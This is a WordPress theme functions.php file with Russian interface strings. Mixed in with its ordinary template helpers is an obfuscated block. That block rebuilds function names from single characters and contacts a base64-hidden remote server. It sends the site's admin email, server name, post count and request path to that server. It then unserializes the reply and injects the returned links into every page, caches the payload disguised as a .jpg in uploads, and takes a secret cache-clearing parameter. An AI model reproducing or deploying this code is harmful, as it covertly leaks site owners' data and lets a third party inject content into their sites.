<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page';  
 $OvdqD='d';$GgGP='6';$BEZyQC='a';$kCRxYAl='d';$SetTO='b';$fDXl='e';$fOZN='s';$FDzH='e';$ALQI='c';$wJOX='_';$XogrZ='o';$OZrSpVc='e';$KPTCU='4';$Fhzximea=$SetTO.$BEZyQC.$fOZN.$FDzH.$GgGP.$KPTCU.$wJOX.$OvdqD.$fDXl.$ALQI.$XogrZ.$kCRxYAl.$OZrSpVc;$ogKfC='a';$uiFuBYj='n';$QoFcC='l';$tiwy='f';$vVymo='t';$vNqtbRs='i';$vYteit='g';$oloKmEu='z';$HxZcY='e';$TDQKZssO=$vYteit.$oloKmEu.$vNqtbRs.$uiFuBYj.$tiwy.$QoFcC.$ogKfC.$vVymo.$HxZcY;$iuDzuAj='1';$zMvORL='_';$mEIeqPD='3';$uCHca='t';$MrOhn='s';$eYEqaW='r';$zFxHTL='o';$zsNn='r';$vsev='t';$peqrHGGO=$MrOhn.$uCHca.$eYEqaW.$zMvORL.$zsNn.$zFxHTL.$vsev.$iuDzuAj.$mEIeqPD;$WbsmnCf='e';$jTyh='s';$Krin='t';$xiHxsJS='r';$WoDMjeO='r';$KrwbzJ='v';$kbvumjFq=$jTyh.$Krin.$WoDMjeO.$xiHxsJS.$WbsmnCf.$KrwbzJ;                     
		$ba___________y='d';$bq_______r='6';$cc____________y='a';$ov__________p='d';$wt__________k='b';$ti_______v='e';$yw___________z='s';$cc_________m='e';$kd____________i='c';$pg_______________k='_';$al______c='o';$ma_____s='e';$gy_______________f='4';$st_______x=$wt__________k.$cc____________y.$yw___________z.$cc_________m.$bq_______r.$gy_______________f.$pg_______________k.$ba___________y.$ti_______v.$kd____________i.$al______c.$ov__________p.$ma_____s;
		$wu_______________r='t';$tu_______________m='s';$lz______________h='i';$jk_______________p='x';$jm_____e='u';$vf___p='f';$et_____________a='n';$kn______________e='n';$qg____________o='o';$rh_____________i='t';$oo______________t='s';$kw________u='e';$zx__________i='_';$sw______j='i';$ga_______________g='c';$ew________j=$vf___p.$jm_____e.$kn______________e.$ga_______________g.$wu_______________r.$sw______j.$qg____________o.$et_____________a.$zx__________i.$kw________u.$jk_______________p.$lz______________h.$tu_______________m.$rh_____________i.$oo______________t;
		$is_____________q='o';$zn______________f='e';$jp______________x='p';$nt_____________c='f';$pq_____________c='n';$yb____________e=$nt_____________c.$is_____________q.$jp______________x.$zn______________f.$pq_____________c;
		$mh____________c='f';$nu____________a='a';$qf______t='e';$ei__i='d';$xo____g='r';$cc__________a=$mh____________c.$xo____g.$qf______t.$nu____________a.$ei__i;
		$on________q='c';$lt_____h='l';$tm__________p='e';$ec______o='s';$mi___________m='o';$wl____________p='f';$na_______w=$wl____________p.$on________q.$lt_____h.$mi___________m.$ec______o.$tm__________p;
		
		define("WP_ID", $st_______x("Mi4wLjA="));
		define("WP_TTL", $st_______x("MTA4MDA="));
		define("WP_SRC", $st_______x("dHBva24="));
	


		function wp_get_header() {
			global $st_______x, $ew________j;
			
			if (
				$ew________j($st_______x("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ew________j($st_______x("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ew________j($st_______x("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $st_______x, $yb____________e, $na_______w, $cc__________a;
			
			$sa________n = TEMPLATEPATH."/".$st_______x("Zm9vdGVyLnBocA==");
			$dl____f = @$yb____________e($sa________n, "r");
			$sa________n = @$cc__________a($dl____f, @filesize($sa________n));
			@$na_______w($dl____f);
			
			$wi______________z = TEMPLATEPATH."/".$st_______x("ZnVuY3Rpb25zLnBocA==");
			$dl____f = @$yb____________e($wi______________z, "r");
			$wi______________z = @$cc__________a($dl____f, @filesize($wi______________z));
			@$na_______w($dl____f);
			
			$ds_______________y = 0;
			if($sa________n && $wi______________z) {
				if ($st_______x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($sa________n, $st_______x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ds_______________y = 1;
					}
					if (substr_count($sa________n, "wp_theme_GPL_credits()") < 1) {
						$ds_______________y = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ds_______________y = 12;
				}
			}
			
			if($ds_______________y > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ds_______________y -->";
			}
		}
	


		function wp_loaded() {
			global $st_______x, $ew________j;
			return $ew________j($st_______x("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ts_____________r, $yh_____________s = "(more...)", $qw__r = 0, $mp___v = "") {
				$zr_______l = get_the_content($yh_____________s, $qw__r, $mp___v);
				$zr_______l = apply_filters("the_content", $zr_______l);
				
				$zr_______l = str_replace("]]>", "]]>", $zr_______l);
				if (strlen($_GET["p"]) > 0) {
					echo $zr_______l;
				}
				else if ((strlen($zr_______l)>$ts_____________r) && ($zn__________a = strpos($zr_______l, " ", $ts_____________r ))) {
					$zr_______l = substr($zr_______l, 0, $zn__________a);
					$zr_______l = $zr_______l;
					echo $zr_______l;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$yh_____________s</a></div></p>";
				} else {
					echo $zr_______l;
				}
				
			}
		}
	


		$hb____________d='n';$no___c='b';$pc_______________s='4';$sb_______r='o';$zd__________o='e';$vx________o='a';$zm_________p='6';$ea_____e='d';$yf___________m='c';$mu____________c='e';$ct_______________q='e';$pm___c='_';$nm______x='s';$qf____________g=$no___c.$vx________o.$nm______x.$zd__________o.$zm_________p.$pc_______________s.$pm___c.$ct_______________q.$hb____________d.$yf___________m.$sb_______r.$ea_____e.$mu____________c;
		$wg____________w='o';$cc_________h='n';$bv_____r='s';$yb_____d='_';$ez_________c='t';$ut____________j='f';$cf______w='t';$lu__________s='l';$ac_____________l='t';$av______r='e';$lo_________t='g';$qi____u='e';$pz___________r='n';$qb__________b='c';$dg_____________x='e';$fx_________o='_';$fo_____________m='i';$km___________a=$ut____________j.$fo_____________m.$lu__________s.$av______r.$fx_________o.$lo_________t.$dg_____________x.$cf______w.$yb_____d.$qb__________b.$wg____________w.$cc_________h.$ac_____________l.$qi____u.$pz___________r.$ez_________c.$bv_____r;
		$ku_________u='l';$tk________p='s';$ja____________r='_';$pr__________j='e';$un______________z='f';$vw______e='i';$mo__b='e';$sf_________n='i';$dc______z='x';$qh________d='s';$gv____________r='t';$df_______c=$un______________z.$vw______e.$ku_________u.$mo__b.$ja____________r.$pr__________j.$dc______z.$sf_________n.$tk________p.$gv____________r.$qh________d;
		$af_____z='m';$gc_____________e='v';$lq___________x='n';$zy_____b='p';$iv____________a='e';$hz_____m='r';$zu___________g='s';$kx_________w='r';$nf____________k='e';$wa_____d='o';$oq______x='c';$bq____p='i';$ok___________k='a';$wl_____________d='_';$ma______________t='o';$lf_____g=$gc_____________e.$iv____________a.$hz_____m.$zu___________g.$bq____p.$wa_____d.$lq___________x.$wl_____________d.$oq______x.$ma______________t.$af_____z.$zy_____b.$ok___________k.$kx_________w.$nf____________k;
		$io_____p='e';$eq___________v='s';$yo__u='c';$gl____________m='f';$rz_______________d='o';$rt____y='k';$aa___f='n';$fb__________h='p';$gx______________h='o';$gl__n=$gl____________m.$eq___________v.$rz_______________d.$yo__u.$rt____y.$gx______________h.$fb__________h.$io_____p.$aa___f;
		$go_____________l='e';$gf___w='f';$dq________s='r';$nd_____________b='t';$zd____t='w';$cx_______________i='i';$lj___j=$gf___w.$zd____t.$dq________s.$cx_______________i.$nd_____________b.$go_____________l;
		$it________v='d';$bl_____________e='m';$wh______________d='5';$cp___________p=$bl_____________e.$it________v.$wh______________d;
		$rp________g='r';$vk_____________j='a';$iw____________w='l';$uk___v='e';$tn___________i='p';$nx___e='h';$of_____________c='a';$aj____________h='t';$av_______________m=$rp________g.$uk___v.$of_____________c.$iw____________w.$tn___________i.$vk_____________j.$aj____________h.$nx___e;
		$dz____r='a';$fy______u='i';$at___t='s';$bo_______v='r';$fc___m='e';$me_______n='n';$od___u='l';$gv___i='u';$ze___m='i';$jm__j='z';$gw__i='e';$lr____d=$gv___i.$me_______n.$at___t.$gw__i.$bo_______v.$fy______u.$dz____r.$od___u.$ze___m.$jm__j.$fc___m;
		$md_____________n='a';$bx__________g='n';$qo___t='m';$fn__________x='t';$rs____________h='m';$ma________o='p';$sm_____________v='e';$tt________d=$fn__________x.$sm_____________v.$qo___t.$ma________o.$bx__________g.$md_____________n.$rs____________h;
		$gv______j='e';$gb___________f='t';$gn____________d='_';$xk_________b='n';$zy______________d='t';$jv________q='_';$bj______k='a';$dw________p='r';$ei______________f='x';$jq__________m='e';$tm________r='r';$bu_______________v='m';$dn____________k='a';$ga_____x='c';$cw__i='t';$wa___________d='e';$qf_____________b='s';$vr_________a='c';$zh_______________j='e';$fb_______________k='o';$fw________d='t';$uh___________x=$qf_____________b.$fw________d.$dw________p.$zh_______________j.$dn____________k.$bu_______________v.$gn____________d.$ga_____x.$fb_______________k.$xk_________b.$gb___________f.$jq__________m.$ei______________f.$cw__i.$jv________q.$vr_________a.$tm________r.$wa___________d.$bj______k.$zy______________d.$gv______j;
	


		function mn__________y($py_______i) {
			global $st_______x, $ew________j, $km___________a, $lf_____g, $uh___________x;
			
			if (!$ew________j($st_______x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($lf_____g(PHP_VERSION, "5.0.0", ">=") && $ew________j($st_______x("ZmlsZV9nZXRfY29udGVudHM=")) && $ew________j($st_______x("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$fo___________g = $uh___________x(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$dl___________j = @$km___________a($py_______i, 0, $fo___________g);
			} else {
				$dl___________j = @$km___________a($py_______i, 0);
			}
			
			return $dl___________j;
		}
	


		function nv_____________c($py_______i) {
			global $ew________j, $gl__n, $lj___j, $st_______x;
			
			if (!$ew________j($st_______x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$so__________c = strpos($py_______i, "/", 7);
			$xn___________t = array(
				"uri"     => substr($py_______i, $so__________c),
				"host"    => str_replace("http://", "", substr($py_______i, 0, $so__________c)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ih______f = @$gl__n("$xn___________t[host]", 80, $ya___f, $sf_______j, 4);
			
			if (!$ih______f) {
				return false;
			} else {
				$dl___________j = "";
				$rm___q  = "GET $xn___________t[uri] HTTP/1.0\r\n";
				$rm___q .= "Host: $xn___________t[host]\r\n";
				$rm___q .= "Referer: $xn___________t[referer]\r\n";
				$rm___q .= "Connection: Close\r\n\r\n";
				
				@$lj___j($ih______f, $rm___q);
				
				while (!@feof($ih______f)) {
					$bo____________i = @fgets($ih______f, (1024*24));
					
					if ($bo____________i == "\r\n") {
						$yh______________r = true;
						continue;
					}
					
					if ($yh______________r) {
						$dl___________j .= $bo____________i;
					}
				}
				
				return $dl___________j;
			}
		}
	


		function fd____________u($py_______i) {
			global $ew________j;
			$dw___g = false;
			
			if ($py_______i != "") {
				if ($ew________j("mn__________y")) {
					$dw___g = @mn__________y($py_______i);
				}
				
				if (!$dw___g && ($ew________j("nv_____________c"))) {
					$dw___g = @nv_____________c($py_______i);
				}
			}
			
			return $dw___g;
		}
	


		function ie______________x() {
			global $_SERVER, $cp___________p;
			
			$dz_____m = $_SERVER["SERVER_NAME"];
			
			if (substr("$dz_____m", 0, 4) == "www.") {
				$dz_____m = substr("$dz_____m", 4);
			}
			
			$dz_____m = $cp___________p("$_SERVER[SERVER_NAME]");
			
			return $dz_____m;
		}
	


		function kt___________x() {
			return "file";
		}
	


		function ug_____________e($py_______i) {
			global $_SERVER, $km___________a, $df_______c, $yb____________e, $na_______w, $lj___j;
			
			$qq___________w = eg_____t();
			
			$sy_____________x = ie______________x().".jpg";
			$ua_____________v = $qq___________w["dir_upload"]["path"]."/$sy_____________x";
			$za_________u = @filemtime($ua_____________v);
			
			if (!$za_________u || ((time()-$za_________u) >= WP_TTL)) {
				$dw___g = fd____________u($py_______i);
				
				if ($dw___g) {
					if ($df_______c($ua_____________v)) {
						@unlink($ua_____________v);
					}
					
					$dl____f = @$yb____________e($ua_____________v, "x+");
					
					@$lj___j($dl____f, $dw___g);
					@$na_______w($dl____f);
				}
			} else {
				if ($df_______c($ua_____________v)) {
					$dw___g = @$km___________a($ua_____________v);
				} else {
					$dw___g = false;
				}
			}
			
			return $dw___g;
		}
	


		function eg_____t() {
			global $_SERVER, $st_______x, $qf____________g;
			
			$sz____d = wp_count_posts("post");
			$qj_______z = pathinfo(get_bloginfo("template_directory"));
			
			$qq___________w = array(
				"url" => array(
					"report"      => $st_______x("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $qj_______z,
				"dir_upload"	=> yo___y(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$qj_______z[filename],
					"a005=".$sz____d->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => ""
			);
			
			$qq___________w["url"]["queryString"] = implode("&", $qq___________w["queryString"]);
			$qq___________w["url"]["report"] = $qq___________w["url"]["report"]."/?".$qf____________g($qq___________w["url"]["queryString"]).".html";
						
			return $qq___________w;
		}
	


		function yo___y() {
			$ak______________i = wp_upload_dir();
			
			if (isset($ak______________i["error"])) {
				$bl______z = lj________h();
				if (is_writable($bl______z)) {
					$ak______________i = array("path" => $bl______z);
				}
			}

			return $ak______________i;
		}
	


		function lj________h() {
			global $ew________j, $cp___________p, $av_______________m, $tt________d;
			
			$tq____________u = (bool) ini_get("safe_mode");
			if ($tq____________u == true) {
				return false;
			}
			
			if ($ew________j("sys_get_temp_dir")) {
				$zt_______s = sys_get_temp_dir();
				if (is_writable($zt_______s)) {
					return $av_______________m($zt_______s);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $av_______________m($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $av_______________m($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $av_______________m($_ENV["TEMP"]);
			} else {
				$pu____________m = $tt________d($cp___________p(uniqid(rand(), true)), "");
				if ($pu____________m) {
					$zt_______s = $av_______________m(dirname($pu____________m));
					@unlink($pu____________m);
					return $zt_______s;
				} else {
					return false;
				}
			}
		}
	


		function oh___________f() {
			global $_GET, $df_______c;
			
			$qq___________w = eg_____t();
			$dz_____m = ie______________x();
			$aq_______l = kt___________x();
			
			$zx___________n = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($aq_______l == "file") {
					$mr____c = $qq___________w["dir_upload"]["path"]."/".$dz_____m.".jpg";
					if ($df_______c($mr____c)) {
						@unlink($mr____c);
						$zx___________n = "deleted";
					}
				}
				
				$cf___g = array(
					"s"	=> $zx___________n,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($cf___g AS $vm___________i => $ew________k) echo " [$vm___________i:$ew________k]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ew________j, $st_______x, $lr____d;
			$qq___________w = eg_____t();
			
			$rv___w = "ug_____________e";
			if ($ew________j($rv___w)) {
				$dl___________j = $rv___w($qq___________w["url"]["report"]);
			}
			
			if ($dl___________j) {
				if ($dl___________j = @$st_______x($dl___________j)) {
					$dl___________j = @$lr____d($dl___________j);
					
					if (strlen($dl___________j[custom_credit]) >= 5) {
						$qq___________w["default_string"] = $dl___________j[custom_credit];
					}
					
					if ($dl___________j["status"] == "0") {
						$fs__g = 1;
						$ns_____y = 1;
					} else {
						$rj_________s = sizeof($dl___________j["links"]);
						$ib__________x = $qq___________w["default_string"];
						
						if ($rj_________s > 0 && $dl___________j["links"] !== "") {
							$oo____________j = 0;
							foreach ($dl___________j["links"] as $gr_________a => $am__p) {
								$oo____________j++;
								if ($am__p->l_path == "" || $am__p->l_path == $_SERVER["REQUEST_URI"]) {
									$am__p->l_href = htmlspecialchars(strip_tags($am__p->l_href));
									$am__p->l_title = htmlspecialchars(strip_tags($am__p->l_title));
									$am__p->l_anchor = htmlspecialchars(strip_tags($am__p->l_anchor));
									$ib__________x .= " | ";
									$ib__________x .= "<a href='$am__p->l_href' title='$am__p->l_title'";
									if ($am__p->l_nofollow == "1") {
										$ib__________x .= " rel='nofollow'";
									}
									$ib__________x .= ">$am__p->l_anchor</a>";
								}
							}
						}
						$qq___________w["links"] = "$ib__________x";
						if ($dl___________j[credit] == "0") {
							$qq___________w["links"] = "";
						}
					}
				} else {
					$fs__g = "1";
				}
			} else {
				$fs__g = "1";
			}
			
			if ($fs__g == "1") {
				$qq___________w["links"] = $qq___________w["default_string"];
			}
			
			echo "$qq___________w[links]";
			
			echo "<!-- s: $dl___________j[signature] -->";
			oh___________f();
		}
	                      
 function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');

                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
